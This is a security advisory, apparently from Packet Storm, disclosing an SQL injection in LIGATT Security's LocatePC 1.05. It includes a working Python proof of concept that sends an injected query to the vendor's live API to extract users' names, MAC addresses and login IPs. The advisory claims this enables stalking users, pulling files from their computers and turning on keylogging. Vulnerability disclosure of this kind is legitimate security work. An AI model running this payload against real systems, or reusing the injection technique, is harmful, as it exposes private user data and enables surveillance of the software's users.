LIGATT Security's LocatePC software version 1.05 suffers from a remote SQL injection vulnerability.
a75bd59d0433d2ccdadcef841bbda360d42c5278246ad2df0b18df13636a1f3atrivial SQL injection in LIGATT Security's LocatePC software
--------------------------------------------------------------------
----------
I'm going to skip all the drama and get straight to it. The
software is crap.
Affected Software:
LocatePC 1.05
Consequences:
Arbitrary SELECT queries against the LocatePC and "mysql" database.
The LocatePC database contains enough information to stalk all
users of the software. It may be possible to instruct the software
to upload arbitrary files from each user's computer to the LocatePC
database, and then to later extract those files from the database.
Activating the software's keylogging functionality is both possible
and hilarious.
Proof of Concept:
#!/usr/bin/python
import httplib
import urllib
import xml.etree.ElementTree
h = httplib.HTTPSConnection('www.ligattsecurity.com')
p = '''<Request
funcname="uName,mac_address,last_login_ip,program_login from user
where LENGTH(last_login_ip) > 0;--"></Request>'''
h.request("POST","/locatePC/api/",p,{"ContentType":"application/x-
www-form-urlencoded"})
r = h.getresponse()
data = urllib.unquote_plus(r.read())
for i in xml.etree.ElementTree.fromstring(data).iter():
if i.tag == "Row":
print ""
elif i.tag == "Cell" and i.text != None:
print i.text
Solution:
DON'T USE LOCATEPC!!!
References:
- http://www.ligattsecurity.com/solutions/locate-pc
© 2022 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed